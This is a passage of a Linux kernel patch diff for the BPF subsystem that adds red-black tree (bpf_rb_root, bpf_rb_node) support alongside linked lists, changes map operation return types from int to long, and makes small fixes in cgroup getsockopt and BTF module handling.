+@@ -3320,26 +3322,32 @@ static int btf_find_list_head(const struct btf *btf, const struct btf_type *pt,
+ 	value_type = btf_find_decl_tag_value(btf, pt, comp_idx, "contains:");
+ 	if (!value_type)
+ 		return -EINVAL;
+-	list_node = strstr(value_type, ":");
+-	if (!list_node)
++	node_field_name = strstr(value_type, ":");
++	if (!node_field_name)
+ 		return -EINVAL;
+-	value_type = kstrndup(value_type, list_node - value_type, GFP_KERNEL | __GFP_NOWARN);
++	value_type = kstrndup(value_type, node_field_name - value_type, GFP_KERNEL | __GFP_NOWARN);
+ 	if (!value_type)
+ 		return -ENOMEM;
+ 	id = btf_find_by_name_kind(btf, value_type, BTF_KIND_STRUCT);
+ 	kfree(value_type);
+ 	if (id < 0)
+ 		return id;
+-	list_node++;
+-	if (str_is_empty(list_node))
++	node_field_name++;
++	if (str_is_empty(node_field_name))
+ 		return -EINVAL;
+-	info->type = BPF_LIST_HEAD;
++	info->type = head_type;
+ 	info->off = off;
+-	info->list_head.value_btf_id = id;
+-	info->list_head.node_name = list_node;
++	info->graph_root.value_btf_id = id;
++	info->graph_root.node_name = node_field_name;
+ 	return BTF_FIELD_FOUND;
+ }
+ 
++#define field_mask_test_name(field_type, field_type_str) \
++	if (field_mask & field_type && !strcmp(name, field_type_str)) { \
++		type = field_type;					\
++		goto end;						\
++	}
++
+ static int btf_get_field_type(const char *name, u32 field_mask, u32 *seen_mask,
+ 			      int *align, int *sz)
+ {
+@@ -3363,18 +3371,11 @@ static int btf_get_field_type(const char *name, u32 field_mask, u32 *seen_mask,
+ 			goto end;
+ 		}
+ 	}
+-	if (field_mask & BPF_LIST_HEAD) {
+-		if (!strcmp(name, "bpf_list_head")) {
+-			type = BPF_LIST_HEAD;
+-			goto end;
+-		}
+-	}
+-	if (field_mask & BPF_LIST_NODE) {
+-		if (!strcmp(name, "bpf_list_node")) {
+-			type = BPF_LIST_NODE;
+-			goto end;
+-		}
+-	}
++	field_mask_test_name(BPF_LIST_HEAD, "bpf_list_head");
++	field_mask_test_name(BPF_LIST_NODE, "bpf_list_node");
++	field_mask_test_name(BPF_RB_ROOT,   "bpf_rb_root");
++	field_mask_test_name(BPF_RB_NODE,   "bpf_rb_node");
++
+ 	/* Only return BPF_KPTR when all other types with matchable names fail */
+ 	if (field_mask & BPF_KPTR) {
+ 		type = BPF_KPTR_REF;
+@@ -3387,6 +3388,8 @@ end:
+ 	return type;
+ }
+ 
++#undef field_mask_test_name
++
+ static int btf_find_struct_field(const struct btf *btf,
+ 				 const struct btf_type *t, u32 field_mask,
+ 				 struct btf_field_info *info, int info_cnt)
+@@ -3419,6 +3422,7 @@ static int btf_find_struct_field(const struct btf *btf,
+ 		case BPF_SPIN_LOCK:
+ 		case BPF_TIMER:
+ 		case BPF_LIST_NODE:
++		case BPF_RB_NODE:
+ 			ret = btf_find_struct(btf, member_type, off, sz, field_type,
+ 					      idx < info_cnt ? &info[idx] : &tmp);
+ 			if (ret < 0)
+@@ -3432,8 +3436,11 @@ static int btf_find_struct_field(const struct btf *btf,
+ 				return ret;
+ 			break;
+ 		case BPF_LIST_HEAD:
+-			ret = btf_find_list_head(btf, t, member_type, i, off, sz,
+-						 idx < info_cnt ? &info[idx] : &tmp);
++		case BPF_RB_ROOT:
++			ret = btf_find_graph_root(btf, t, member_type,
++						  i, off, sz,
++						  idx < info_cnt ? &info[idx] : &tmp,
++						  field_type);
+ 			if (ret < 0)
+ 				return ret;
+ 			break;
+@@ -3480,6 +3487,7 @@ static int btf_find_datasec_var(const struct btf *btf, const struct btf_type *t,
+ 		case BPF_SPIN_LOCK:
+ 		case BPF_TIMER:
+ 		case BPF_LIST_NODE:
++		case BPF_RB_NODE:
+ 			ret = btf_find_struct(btf, var_type, off, sz, field_type,
+ 					      idx < info_cnt ? &info[idx] : &tmp);
+ 			if (ret < 0)
+@@ -3493,8 +3501,11 @@ static int btf_find_datasec_var(const struct btf *btf, const struct btf_type *t,
+ 				return ret;
+ 			break;
+ 		case BPF_LIST_HEAD:
+-			ret = btf_find_list_head(btf, var, var_type, -1, off, sz,
+-						 idx < info_cnt ? &info[idx] : &tmp);
++		case BPF_RB_ROOT:
++			ret = btf_find_graph_root(btf, var, var_type,
++						  -1, off, sz,
++						  idx < info_cnt ? &info[idx] : &tmp,
++						  field_type);
+ 			if (ret < 0)
+ 				return ret;
+ 			break;
+@@ -3596,21 +3607,25 @@ end_btf:
+ 	return ret;
+ }
+ 
+-static int btf_parse_list_head(const struct btf *btf, struct btf_field *field,
+-			       struct btf_field_info *info)
++static int btf_parse_graph_root(const struct btf *btf,
++				struct btf_field *field,
++				struct btf_field_info *info,
++				const char *node_type_name,
++				size_t node_type_align)
+ {
+ 	const struct btf_type *t, *n = NULL;
+ 	const struct btf_member *member;
+ 	u32 offset;
+ 	int i;
+ 
+-	t = btf_type_by_id(btf, info->list_head.value_btf_id);
++	t = btf_type_by_id(btf, info->graph_root.value_btf_id);
+ 	/* We've already checked that value_btf_id is a struct type. We
+ 	 * just need to figure out the offset of the list_node, and
+ 	 * verify its type.
+ 	 */
+ 	for_each_member(i, t, member) {
+-		if (strcmp(info->list_head.node_name, __btf_name_by_offset(btf, member->name_off)))
++		if (strcmp(info->graph_root.node_name,
++			   __btf_name_by_offset(btf, member->name_off)))
+ 			continue;
+ 		/* Invalid BTF, two members with same name */
+ 		if (n)
+@@ -3618,24 +3633,38 @@ static int btf_parse_list_head(const struct btf *btf, struct btf_field *field,
+ 		n = btf_type_by_id(btf, member->type);
+ 		if (!__btf_type_is_struct(n))
+ 			return -EINVAL;
+-		if (strcmp("bpf_list_node", __btf_name_by_offset(btf, n->name_off)))
++		if (strcmp(node_type_name, __btf_name_by_offset(btf, n->name_off)))
+ 			return -EINVAL;
+ 		offset = __btf_member_bit_offset(n, member);
+ 		if (offset % 8)
+ 			return -EINVAL;
+ 		offset /= 8;
+-		if (offset % __alignof__(struct bpf_list_node))
++		if (offset % node_type_align)
+ 			return -EINVAL;
+ 
+-		field->list_head.btf = (struct btf *)btf;
+-		field->list_head.value_btf_id = info->list_head.value_btf_id;
+-		field->list_head.node_offset = offset;
++		field->graph_root.btf = (struct btf *)btf;
++		field->graph_root.value_btf_id = info->graph_root.value_btf_id;
++		field->graph_root.node_offset = offset;
+ 	}
+ 	if (!n)
+ 		return -ENOENT;
+ 	return 0;
+ }
+ 
++static int btf_parse_list_head(const struct btf *btf, struct btf_field *field,
++			       struct btf_field_info *info)
++{
++	return btf_parse_graph_root(btf, field, info, "bpf_list_node",
++					    __alignof__(struct bpf_list_node));
++}
++
++static int btf_parse_rb_root(const struct btf *btf, struct btf_field *field,
++			     struct btf_field_info *info)
++{
++	return btf_parse_graph_root(btf, field, info, "bpf_rb_node",
++					    __alignof__(struct bpf_rb_node));
++}
++
+ struct btf_record *btf_parse_fields(const struct btf *btf, const struct btf_type *t,
+ 				    u32 field_mask, u32 value_size)
+ {
+@@ -3698,7 +3727,13 @@ struct btf_record *btf_parse_fields(const struct btf *btf, const struct btf_type
+ 			if (ret < 0)
+ 				goto end;
+ 			break;
++		case BPF_RB_ROOT:
++			ret = btf_parse_rb_root(btf, &rec->fields[i], &info_arr[i]);
++			if (ret < 0)
++				goto end;
++			break;
+ 		case BPF_LIST_NODE:
++		case BPF_RB_NODE:
+ 			break;
+ 		default:
+ 			ret = -EFAULT;
+@@ -3707,8 +3742,9 @@ struct btf_record *btf_parse_fields(const struct btf *btf, const struct btf_type
+ 		rec->cnt++;
+ 	}
+ 
+-	/* bpf_list_head requires bpf_spin_lock */
+-	if (btf_record_has_field(rec, BPF_LIST_HEAD) && rec->spin_lock_off < 0) {
++	/* bpf_{list_head, rb_node} require bpf_spin_lock */
++	if ((btf_record_has_field(rec, BPF_LIST_HEAD) ||
++	     btf_record_has_field(rec, BPF_RB_ROOT)) && rec->spin_lock_off < 0) {
+ 		ret = -EINVAL;
+ 		goto end;
+ 	}
+@@ -3719,62 +3755,76 @@ end:
+ 	return ERR_PTR(ret);
+ }
+ 
++#define GRAPH_ROOT_MASK (BPF_LIST_HEAD | BPF_RB_ROOT)
++#define GRAPH_NODE_MASK (BPF_LIST_NODE | BPF_RB_NODE)
++
+ int btf_check_and_fixup_fields(const struct btf *btf, struct btf_record *rec)
+ {
+ 	int i;
+ 
+-	/* There are two owning types, kptr_ref and bpf_list_head. The former
+-	 * only supports storing kernel types, which can never store references
+-	 * to program allocated local types, atleast not yet. Hence we only need
+-	 * to ensure that bpf_list_head ownership does not form cycles.
++	/* There are three types that signify ownership of some other type:
++	 *  kptr_ref, bpf_list_head, bpf_rb_root.
++	 * kptr_ref only supports storing kernel types, which can't store
++	 * references to program allocated local types.
++	 *
++	 * Hence we only need to ensure that bpf_{list_head,rb_root} ownership
++	 * does not form cycles.
+ 	 */
+-	if (IS_ERR_OR_NULL(rec) || !(rec->field_mask & BPF_LIST_HEAD))
++	if (IS_ERR_OR_NULL(rec) || !(rec->field_mask & GRAPH_ROOT_MASK))
+ 		return 0;
+ 	for (i = 0; i < rec->cnt; i++) {
+ 		struct btf_struct_meta *meta;
+ 		u32 btf_id;
+ 
+-		if (!(rec->fields[i].type & BPF_LIST_HEAD))
++		if (!(rec->fields[i].type & GRAPH_ROOT_MASK))
+ 			continue;
+-		btf_id = rec->fields[i].list_head.value_btf_id;
++		btf_id = rec->fields[i].graph_root.value_btf_id;
+ 		meta = btf_find_struct_meta(btf, btf_id);
+ 		if (!meta)
+ 			return -EFAULT;
+-		rec->fields[i].list_head.value_rec = meta->record;
++		rec->fields[i].graph_root.value_rec = meta->record;
+ 
+-		if (!(rec->field_mask & BPF_LIST_NODE))
++		/* We need to set value_rec for all root types, but no need
++		 * to check ownership cycle for a type unless it's also a
++		 * node type.
++		 */
++		if (!(rec->field_mask & GRAPH_NODE_MASK))
+ 			continue;
+ 
+ 		/* We need to ensure ownership acyclicity among all types. The
+ 		 * proper way to do it would be to topologically sort all BTF
+ 		 * IDs based on the ownership edges, since there can be multiple
+-		 * bpf_list_head in a type. Instead, we use the following
+-		 * reasoning:
++		 * bpf_{list_head,rb_node} in a type. Instead, we use the
++		 * following resaoning:
+ 		 *
+ 		 * - A type can only be owned by another type in user BTF if it
+-		 *   has a bpf_list_node.
++		 *   has a bpf_{list,rb}_node. Let's call these node types.
+ 		 * - A type can only _own_ another type in user BTF if it has a
+-		 *   bpf_list_head.
++		 *   bpf_{list_head,rb_root}. Let's call these root types.
+ 		 *
+-		 * We ensure that if a type has both bpf_list_head and
+-		 * bpf_list_node, its element types cannot be owning types.
++		 * We ensure that if a type is both a root and node, its
++		 * element types cannot be root types.
+ 		 *
+ 		 * To ensure acyclicity:
+ 		 *
+-		 * When A only has bpf_list_head, ownership chain can be:
++		 * When A is an root type but not a node, its ownership
++		 * chain can be:
+ 		 *	A -> B -> C
+ 		 * Where:
+-		 * - B has both bpf_list_head and bpf_list_node.
+-		 * - C only has bpf_list_node.
++		 * - A is an root, e.g. has bpf_rb_root.
++		 * - B is both a root and node, e.g. has bpf_rb_node and
++		 *   bpf_list_head.
++		 * - C is only an root, e.g. has bpf_list_node
+ 		 *
+-		 * When A has both bpf_list_head and bpf_list_node, some other
+-		 * type already owns it in the BTF domain, hence it can not own
+-		 * another owning type through any of the bpf_list_head edges.
++		 * When A is both a root and node, some other type already
++		 * owns it in the BTF domain, hence it can not own
++		 * another root type through any of the ownership edges.
+ 		 *	A -> B
+ 		 * Where:
+-		 * - B only has bpf_list_node.
++		 * - A is both an root and node.
++		 * - B is only an node.
+ 		 */
+-		if (meta->record->field_mask & BPF_LIST_HEAD)
++		if (meta->record->field_mask & GRAPH_ROOT_MASK)
+ 			return -ELOOP;
+ 	}
+ 	return 0;
+@@ -5237,6 +5287,8 @@ static const char *alloc_obj_fields[] = {
+ 	"bpf_spin_lock",
+ 	"bpf_list_head",
+ 	"bpf_list_node",
++	"bpf_rb_root",
++	"bpf_rb_node",
+ };
+ 
+ static struct btf_struct_metas *
+@@ -5310,7 +5362,8 @@ btf_parse_struct_metas(struct bpf_verifier_log *log, struct btf *btf)
+ 
+ 		type = &tab->types[tab->cnt];
+ 		type->btf_id = i;
+-		record = btf_parse_fields(btf, t, BPF_SPIN_LOCK | BPF_LIST_HEAD | BPF_LIST_NODE, t->size);
++		record = btf_parse_fields(btf, t, BPF_SPIN_LOCK | BPF_LIST_HEAD | BPF_LIST_NODE |
++						  BPF_RB_ROOT | BPF_RB_NODE, t->size);
+ 		/* The record cannot be unset, treat it as an error if so */
+ 		if (IS_ERR_OR_NULL(record)) {
+ 			ret = PTR_ERR_OR_ZERO(record) ?: -EFAULT;
+@@ -5795,12 +5848,8 @@ struct btf *bpf_prog_get_target_btf(const struct bpf_prog *prog)
+ 
+ static bool is_int_ptr(struct btf *btf, const struct btf_type *t)
+ {
+-	/* t comes in already as a pointer */
+-	t = btf_type_by_id(btf, t->type);
+-
+-	/* allow const */
+-	if (BTF_INFO_KIND(t->info) == BTF_KIND_CONST)
+-		t = btf_type_by_id(btf, t->type);
++	/* skip modifiers */
++	t = btf_type_skip_modifiers(btf, t->type, NULL);
+ 
+ 	return btf_type_is_int(t);
+ }
+@@ -8136,12 +8185,10 @@ check_modules:
+ 		btf_get(mod_btf);
+ 		spin_unlock_bh(&btf_idr_lock);
+ 		cands = bpf_core_add_cands(cands, mod_btf, btf_nr_types(main_btf));
+-		if (IS_ERR(cands)) {
+-			btf_put(mod_btf);
++		btf_put(mod_btf);
++		if (IS_ERR(cands))
+ 			return ERR_CAST(cands);
+-		}
+ 		spin_lock_bh(&btf_idr_lock);
+-		btf_put(mod_btf);
+ 	}
+ 	spin_unlock_bh(&btf_idr_lock);
+ 	/* cands is a pointer to kmalloced memory here if cands->cnt > 0
+diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
+index bf2fdb33fb313..819f011f0a9cd 100644
+--- a/kernel/bpf/cgroup.c
++++ b/kernel/bpf/cgroup.c
+@@ -1921,14 +1921,17 @@ int __cgroup_bpf_run_filter_getsockopt(struct sock *sk, int level,
+ 	if (ret < 0)
+ 		goto out;
+ 
+-	if (ctx.optlen > max_optlen || ctx.optlen < 0) {
++	if (optval && (ctx.optlen > max_optlen || ctx.optlen < 0)) {
+ 		ret = -EFAULT;
+ 		goto out;
+ 	}
+ 
+ 	if (ctx.optlen != 0) {
+-		if (copy_to_user(optval, ctx.optval, ctx.optlen) ||
+-		    put_user(ctx.optlen, optlen)) {
++		if (optval && copy_to_user(optval, ctx.optval, ctx.optlen)) {
++			ret = -EFAULT;
++			goto out;
++		}
++		if (put_user(ctx.optlen, optlen)) {
+ 			ret = -EFAULT;
+ 			goto out;
+ 		}
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index e0b2d016f0bf9..d33785bedbe5d 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -540,7 +540,7 @@ static void __cpu_map_entry_replace(struct bpf_cpu_map *cmap,
+ 	}
+ }
+ 
+-static int cpu_map_delete_elem(struct bpf_map *map, void *key)
++static long cpu_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_cpu_map *cmap = container_of(map, struct bpf_cpu_map, map);
+ 	u32 key_cpu = *(u32 *)key;
+@@ -553,8 +553,8 @@ static int cpu_map_delete_elem(struct bpf_map *map, void *key)
+ 	return 0;
+ }
+ 
+-static int cpu_map_update_elem(struct bpf_map *map, void *key, void *value,
+-			       u64 map_flags)
++static long cpu_map_update_elem(struct bpf_map *map, void *key, void *value,
++				u64 map_flags)
+ {
+ 	struct bpf_cpu_map *cmap = container_of(map, struct bpf_cpu_map, map);
+ 	struct bpf_cpumap_val cpumap_value = {};
+@@ -667,7 +667,7 @@ static int cpu_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
+ 	return 0;
+ }
+ 
+-static int cpu_map_redirect(struct bpf_map *map, u64 index, u64 flags)
++static long cpu_map_redirect(struct bpf_map *map, u64 index, u64 flags)
+ {
+ 	return __bpf_xdp_redirect_map(map, index, flags, 0,
+ 				      __cpu_map_lookup_elem);
+diff --git a/kernel/bpf/devmap.c b/kernel/bpf/devmap.c
+index d01e4c55b376a..95dafde24ba9c 100644
+--- a/kernel/bpf/devmap.c
++++ b/kernel/bpf/devmap.c
+@@ -799,7 +799,7 @@ static void __dev_map_entry_free(struct rcu_head *rcu)
+ 	kfree(dev);
+ }
+ 
+-static int dev_map_delete_elem(struct bpf_map *map, void *key)
++static long dev_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
+ 	struct bpf_dtab_netdev *old_dev;
+@@ -814,7 +814,7 @@ static int dev_map_delete_elem(struct bpf_map *map, void *key)
+ 	return 0;
+ }
+ 
+-static int dev_map_hash_delete_elem(struct bpf_map *map, void *key)
++static long dev_map_hash_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
+ 	struct bpf_dtab_netdev *old_dev;
+@@ -885,8 +885,8 @@ err_out:
+ 	return ERR_PTR(-EINVAL);
+ }
+ 
+-static int __dev_map_update_elem(struct net *net, struct bpf_map *map,
+-				 void *key, void *value, u64 map_flags)
++static long __dev_map_update_elem(struct net *net, struct bpf_map *map,
++				  void *key, void *value, u64 map_flags)
+ {
+ 	struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
+ 	struct bpf_dtab_netdev *dev, *old_dev;
+@@ -925,15 +925,15 @@ static int __dev_map_update_elem(struct net *net, struct bpf_map *map,
+ 	return 0;
+ }
+ 
+-static int dev_map_update_elem(struct bpf_map *map, void *key, void *value,
+-			       u64 map_flags)
++static long dev_map_update_elem(struct bpf_map *map, void *key, void *value,
++				u64 map_flags)
+ {
+ 	return __dev_map_update_elem(current->nsproxy->net_ns,
+ 				     map, key, value, map_flags);
+ }
+ 
+-static int __dev_map_hash_update_elem(struct net *net, struct bpf_map *map,
+-				     void *key, void *value, u64 map_flags)
++static long __dev_map_hash_update_elem(struct net *net, struct bpf_map *map,
++				       void *key, void *value, u64 map_flags)
+ {
+ 	struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
+ 	struct bpf_dtab_netdev *dev, *old_dev;
+@@ -985,21 +985,21 @@ out_err:
+ 	return err;
+ }
+ 
+-static int dev_map_hash_update_elem(struct bpf_map *map, void *key, void *value,
+-				   u64 map_flags)
++static long dev_map_hash_update_elem(struct bpf_map *map, void *key, void *value,
++				     u64 map_flags)
+ {
+ 	return __dev_map_hash_update_elem(current->nsproxy->net_ns,
+ 					 map, key, value, map_flags);
+ }
+ 
+-static int dev_map_redirect(struct bpf_map *map, u64 ifindex, u64 flags)
++static long dev_map_redirect(struct bpf_map *map, u64 ifindex, u64 flags)
+ {
+ 	return __bpf_xdp_redirect_map(map, ifindex, flags,
+ 				      BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS,
+ 				      __dev_map_lookup_elem);
+ }
+ 
+-static int dev_hash_map_redirect(struct bpf_map *map, u64 ifindex, u64 flags)
++static long dev_hash_map_redirect(struct bpf_map *map, u64 ifindex, u64 flags)
+ {
+ 	return __bpf_xdp_redirect_map(map, ifindex, flags,
+ 				      BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS,
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index 5dfcb5ad0d068..90852e0e64f26 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -1057,8 +1057,8 @@ static int check_flags(struct bpf_htab *htab, struct htab_elem *l_old,
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int htab_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				u64 map_flags)
++static long htab_map_update_elem(struct bpf_map *map, void *key, void *value,
++				 u64 map_flags)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct htab_elem *l_new = NULL, *l_old;
+@@ -1159,8 +1159,8 @@ static void htab_lru_push_free(struct bpf_htab *htab, struct htab_elem *elem)
+ 	bpf_lru_push_free(&htab->lru, &elem->lru_node);
+ }
+ 
+-static int htab_lru_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				    u64 map_flags)
++static long htab_lru_map_update_elem(struct bpf_map *map, void *key, void *value,
++				     u64 map_flags)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct htab_elem *l_new, *l_old = NULL;
+@@ -1226,9 +1226,9 @@ err:
+ 	return ret;
+ }
+ 
+-static int __htab_percpu_map_update_elem(struct bpf_map *map, void *key,
+-					 void *value, u64 map_flags,
+-					 bool onallcpus)
++static long __htab_percpu_map_update_elem(struct bpf_map *map, void *key,
++					  void *value, u64 map_flags,
++					  bool onallcpus)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct htab_elem *l_new = NULL, *l_old;
+@@ -1281,9 +1281,9 @@ err:
+ 	return ret;
+ }
+ 
+-static int __htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
+-					     void *value, u64 map_flags,
+-					     bool onallcpus)
++static long __htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
++					      void *value, u64 map_flags,
++					      bool onallcpus)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct htab_elem *l_new = NULL, *l_old;
+@@ -1348,21 +1348,21 @@ err:
+ 	return ret;
+ }
+ 
+-static int htab_percpu_map_update_elem(struct bpf_map *map, void *key,
+-				       void *value, u64 map_flags)
++static long htab_percpu_map_update_elem(struct bpf_map *map, void *key,
++					void *value, u64 map_flags)
+ {
+ 	return __htab_percpu_map_update_elem(map, key, value, map_flags, false);
+ }
+ 
+-static int htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
+-					   void *value, u64 map_flags)
++static long htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
++					    void *value, u64 map_flags)
+ {
+ 	return __htab_lru_percpu_map_update_elem(map, key, value, map_flags,
+ 						 false);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int htab_map_delete_elem(struct bpf_map *map, void *key)
++static long htab_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct hlist_nulls_head *head;
+@@ -1398,7 +1398,7 @@ static int htab_map_delete_elem(struct bpf_map *map, void *key)
+ 	return ret;
+ }
+ 
+-static int htab_lru_map_delete_elem(struct bpf_map *map, void *key)
++static long htab_lru_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct hlist_nulls_head *head;
+@@ -2119,8 +2119,8 @@ static const struct bpf_iter_seq_info iter_seq_info = {
+ 	.seq_priv_size		= sizeof(struct bpf_iter_seq_hash_map_info),
+ };
+ 
+-static int bpf_for_each_hash_elem(struct bpf_map *map, bpf_callback_t callback_fn,
+-				  void *callback_ctx, u64 flags)
++static long bpf_for_each_hash_elem(struct bpf_map *map, bpf_callback_t callback_fn,
++				   void *callback_ctx, u64 flags)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct hlist_nulls_head *head;
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index af30c6cbd65db..5b692a5f2946b 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -1745,12 +1745,12 @@ unlock:
+ 	while (head != orig_head) {
+ 		void *obj = head;
+ 
+-		obj -= field->list_head.node_offset;
++		obj -= field->graph_root.node_offset;
+ 		head = head->next;
+ 		/* The contained type can also have resources, including a
+ 		 * bpf_list_head which needs to be freed.
+ 		 */
+-		bpf_obj_free_fields(field->list_head.value_rec, obj);
++		bpf_obj_free_fields(field->graph_root.value_rec, obj);
+ 		/* bpf_mem_free requires migrate_disable(), since we can be
+ 		 * called from map free path as well apart from BPF program (as
+ 		 * part of map ops doing bpf_obj_free_fields).
+@@ -1761,6 +1761,46 @@ unlock:
+ 	}
+ }
+ 
++/* Like rbtree_postorder_for_each_entry_safe, but 'pos' and 'n' are
++ * 'rb_node *', so field name of rb_node within containing struct is not
++ * needed.
++ *
++ * Since bpf_rb_tree's node type has a corresponding struct btf_field with
++ * graph_root.node_offset, it's not necessary to know field name
++ * or type of node struct
++ */
++#define bpf_rbtree_postorder_for_each_entry_safe(pos, n, root) \
++	for (pos = rb_first_postorder(root); \
++	    pos && ({ n = rb_next_postorder(pos); 1; }); \
++	    pos = n)
++
++void bpf_rb_root_free(const struct btf_field *field, void *rb_root,
++		      struct bpf_spin_lock *spin_lock)
++{
++	struct rb_root_cached orig_root, *root = rb_root;
++	struct rb_node *pos, *n;
++	void *obj;
++
++	BUILD_BUG_ON(sizeof(struct rb_root_cached) > sizeof(struct bpf_rb_root));
++	BUILD_BUG_ON(__alignof__(struct rb_root_cached) > __alignof__(struct bpf_rb_root));
++
++	__bpf_spin_lock_irqsave(spin_lock);
++	orig_root = *root;
++	*root = RB_ROOT_CACHED;
++	__bpf_spin_unlock_irqrestore(spin_lock);
++
++	bpf_rbtree_postorder_for_each_entry_safe(pos, n, &orig_root.rb_root) {
++		obj = pos;
++		obj -= field->graph_root.node_offset;
++
++		bpf_obj_free_fields(field->graph_root.value_rec, obj);
++
++		migrate_disable();
++		bpf_mem_free(&bpf_global_ma, obj);
++		migrate_enable();
++	}
++}
++
+ __diag_push();
+ __diag_ignore_all("-Wmissing-prototypes",
+ 		  "Global functions as their definitions will be in vmlinux BTF");
+@@ -1833,6 +1873,56 @@ struct bpf_list_node *bpf_list_pop_back(struct bpf_list_head *head)
+ 	return __bpf_list_del(head, true);
+ }
+ 
++__bpf_kfunc struct bpf_rb_node *bpf_rbtree_remove(struct bpf_rb_root *root,
++						  struct bpf_rb_node *node)
++{
++	struct rb_root_cached *r = (struct rb_root_cached *)root;
++	struct rb_node *n = (struct rb_node *)node;
++
++	rb_erase_cached(n, r);
++	RB_CLEAR_NODE(n);
++	return (struct bpf_rb_node *)n;
++}
++
++/* Need to copy rbtree_add_cached's logic here because our 'less' is a BPF
++ * program
++ */
++static void __bpf_rbtree_add(struct bpf_rb_root *root, struct bpf_rb_node *node,
++			     void *less)
++{
++	struct rb_node **link = &((struct rb_root_cached *)root)->rb_root.rb_node;
++	bpf_callback_t cb = (bpf_callback_t)less;
++	struct rb_node *parent = NULL;
++	bool leftmost = true;
++
++	while (*link) {
++		parent = *link;
++		if (cb((uintptr_t)node, (uintptr_t)parent, 0, 0, 0)) {
++			link = &parent->rb_left;
++		} else {
++			link = &parent->rb_right;
++			leftmost = false;
++		}
++	}
++
++	rb_link_node((struct rb_node *)node, parent, link);
++	rb_insert_color_cached((struct rb_node *)node,
++			       (struct rb_root_cached *)root, leftmost);
++}
++
++__bpf_kfunc void bpf_rbtree_add(struct bpf_rb_root *root, struct bpf_rb_node *node,
++				bool (less)(struct bpf_rb_node *a, const struct bpf_rb_node *b))
++{
++	__bpf_rbtree_add(root, node, (void *)less);
++}
++
++__bpf_kfunc struct bpf_rb_node *bpf_rbtree_first(struct bpf_rb_root *root)
++{
++	struct rb_root_cached *r = (struct rb_root_cached *)root;
++
++	return (struct bpf_rb_node *)rb_first_cached(r);
++}
++
+ /**
+  * bpf_task_acquire - Acquire a reference to a task. A task acquired by this
+  * kfunc which is not stored in a map as a kptr, must be released by calling
+@@ -2057,6 +2147,10 @@ BTF_ID_FLAGS(func, bpf_task_acquire, KF_ACQUIRE | KF_TRUSTED_ARGS)
+ BTF_ID_FLAGS(func, bpf_task_acquire_not_zero, KF_ACQUIRE | KF_RCU | KF_RET_NULL)
+ BTF_ID_FLAGS(func, bpf_task_kptr_get, KF_ACQUIRE | KF_KPTR_GET | KF_RET_NULL)
+ BTF_ID_FLAGS(func, bpf_task_release, KF_RELEASE)
++BTF_ID_FLAGS(func, bpf_rbtree_remove, KF_ACQUIRE)
++BTF_ID_FLAGS(func, bpf_rbtree_add)
++BTF_ID_FLAGS(func, bpf_rbtree_first, KF_RET_NULL)
++
+ #ifdef CONFIG_CGROUPS
+ BTF_ID_FLAGS(func, bpf_cgroup_acquire, KF_ACQUIRE | KF_TRUSTED_ARGS)
+ BTF_ID_FLAGS(func, bpf_cgroup_kptr_get, KF_ACQUIRE | KF_KPTR_GET | KF_RET_NULL)
+diff --git a/kernel/bpf/local_storage.c b/kernel/bpf/local_storage.c
+index e90d9f63edc5d..66d8ce2ab5b34 100644
+--- a/kernel/bpf/local_storage.c
++++ b/kernel/bpf/local_storage.c
+@@ -141,8 +141,8 @@ static void *cgroup_storage_lookup_elem(struct bpf_map *_map, void *key)
+ 	return &READ_ONCE(storage->buf)->data[0];
+ }
+ 
+-static int cgroup_storage_update_elem(struct bpf_map *map, void *key,
+-				      void *value, u64 flags)
++static long cgroup_storage_update_elem(struct bpf_map *map, void *key,
++				       void *value, u64 flags)
+ {
+ 	struct bpf_cgroup_storage *storage;
+ 	struct bpf_storage_buffer *new;
+@@ -348,7 +348,7 @@ static void cgroup_storage_map_free(struct bpf_map *_map)
+ 	bpf_map_area_free(map);
+ }
+ 
+-static int cgroup_storage_delete_elem(struct bpf_map *map, void *key)
++static long cgroup_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	return -EINVAL;
+ }
+diff --git a/kernel/bpf/lpm_trie.c b/kernel/bpf/lpm_trie.c
+index d833496e9e426..27980506fc7d5 100644
+--- a/kernel/bpf/lpm_trie.c
++++ b/kernel/bpf/lpm_trie.c
+@@ -300,8 +300,8 @@ static struct lpm_trie_node *lpm_trie_node_alloc(const struct lpm_trie *trie,
+ }
+ 
+ /* Called from syscall or from eBPF program */
